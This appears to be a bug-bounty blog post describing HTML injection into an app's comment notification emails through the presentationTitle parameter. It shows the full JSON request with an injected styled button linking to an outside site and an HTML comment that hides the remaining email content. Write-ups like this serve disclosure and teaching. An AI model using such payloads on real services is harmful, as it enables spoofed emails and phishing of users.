Exploiting HTML Injection in Email
Sequel to my last post, I’ll be discussing about HTML injection on the same target. HTMLi is a vulnerability that can be exploited in any application that renders HTML code; email happens to be one. The rest of this post explains how I was able to inject HTML in email via a comment notification feature on the target.
Remember the HTML Injection left undiscussed here? So, it happened that the values of the comment
and presentationTitle
parameters reflected in the notification emails.
The body initially looked like the following:
{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}}
Then, after injecting the parameter presentationTitle
with HTML attributes, it looks like the following:
{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}}
A natural notification looks like the following:
And a supernatural one looks like this :D
Amazing right? I got the exact HTML by viewing the original message: Click the ellipsis and click “Show Original”
Thank you for your time. And I hope you enjoyed reading this.
Share on